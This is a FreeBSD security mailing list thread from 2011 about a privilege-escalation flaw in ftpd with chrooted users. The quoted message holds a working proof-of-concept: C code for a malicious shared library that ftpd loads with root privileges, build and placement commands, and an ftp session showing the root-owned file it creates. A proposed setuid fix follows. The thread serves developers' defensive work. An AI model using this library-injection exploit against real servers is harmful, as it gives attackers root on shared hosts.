ftpd security issue ?

Titus Manea titus at edc.ro
Thu Dec 1 01:30:02 UTC 2011 

Move the seteuid

   pid = (strcmp(gargv[0], _PATH_LS) == 0) ? fork() : vfork();
        switch(pid) {
        case -1:                        /* error */
                (void)close(pdes[0]);
                (void)close(pdes[1]);
                goto pfree;
                /* NOTREACHED */
        case 0:                         /* child */
         setuid(geteuid());

On Wed, Nov 30, 2011 at 08:01:01PM -0500, Mike Tancsa wrote:
> On 11/30/2011 7:01 PM, Xin LI wrote:
> > 
> >> BTW. This vulnerability affects only configurations, where
> >> /etc/ftpchroot exists or anonymous user is allowed to create files
> >> inside etc and lib dirs.
> > 
> > This doesn't seem to be typical configuration or no?
> 
> I think in shared hosting environments it would be somewhat common.  For
> annon ftp, I dont think the anon user would be able to create / write to
> a lib directory.
> 
> > 
> > Will the attached patch fix the problem?
> > 
> > (I think libc should just refuse /etc/nsswitch.conf and libraries if
> > they are writable by others by the way)
> 
> It does not seem to prevent the issue for me.  Using Przemyslaw  program's,
> 
> #include <stdio.h>
> #include <fcntl.h>
> 
> void _init() {
>         setuid(0);
>         setgid(0);
>         FILE *fp = fopen("/newfile", "w+");
>         fprintf(fp, "%d %d\n", getuid(), geteuid());
> }
> 
> cc -o dummy.o -c dummy.c -fPIC ; cc -shared -Wl,-soname,dummy.so -o
> dummy.so dummy.o -nostartfiles ; mv dummy.so
> ~testuser/lib/nss_compat.so.1 ; chown testuser ~testuser/lib/nss_compat.so.1
> 
> 
> ftp localhost
> Trying 127.0.0.1...
> Connected to localhost.
> 220 vmtest.localdomain FTP server (Version 6.00LS) ready.
> Name (localhost:mdtancsa): testuser
> 331 Password required for testuser.
> Password:
> 230 User testuser logged in, access restrictions apply.
> Remote system type is UNIX.
> Using binary mode to transfer files.
> ftp> dir
> 229 Entering Extended Passive Mode (|||62436|)
> 150 Opening ASCII mode data connection for '/bin/ls'.
> total 106
> -rw-r--r--  1 1002  1002    763 Nov 30 15:17 .cshrc
> -rw-------  1 1002  1002    193 Nov 30 16:36 .history
> drwxr-xr-x  2 1002  1002    512 Nov 30 16:05 etc
> -r-xr-xr-x  1 0     1002  95076 Nov 30 19:50 ftpd
> drwxr-xr-x  2 1002  1002    512 Nov 30 19:56 lib
> -rw-r--r--  1 0     1002     79 Nov 30 16:34 t.c
> -rwxr-xr-x  1 0     1002     24 Nov 30 16:37 t.sh
> 226 Transfer complete.
> ftp> dir
> 229 Entering Extended Passive Mode (|||50577|)
> 150 Opening ASCII mode data connection for '/bin/ls'.
> total 108
> -rw-r--r--  1 1002  1002    763 Nov 30 15:17 .cshrc
> -rw-------  1 1002  1002    193 Nov 30 16:36 .history
> drwxr-xr-x  2 1002  1002    512 Nov 30 16:05 etc
> -r-xr-xr-x  1 0     1002  95076 Nov 30 19:50 ftpd
> drwxr-xr-x  2 1002  1002    512 Nov 30 19:56 lib
> -rw-r--r--  1 0     1002      4 Nov 30 19:58 newfile
> -rw-r--r--  1 0     1002     79 Nov 30 16:34 t.c
> -rwxr-xr-x  1 0     1002     24 Nov 30 16:37 t.sh
> 226 Transfer complete.
> ftp>
> 
> the file created is root
> 
> 
> -- 
> -------------------
> Mike Tancsa, tel +1 519 651 3400
> Sentex Communications, mike at sentex.net
> Providing Internet services since 1994 www.sentex.net
> Cambridge, Ontario Canada   http://www.tancsa.com/
> _______________________________________________
> freebsd-security at freebsd.org mailing list
> http://lists.freebsd.org/mailman/listinfo/freebsd-security
> To unsubscribe, send any mail to "freebsd-security-unsubscribe at freebsd.org"

-- 

---------------------------------------------------------------------
How an engineer writes a program: Starts by debugging an empty file...
 Titus Manea  <titus at edc.ro>       |  Eastern Digital Inc.

More information about the freebsd-security mailing list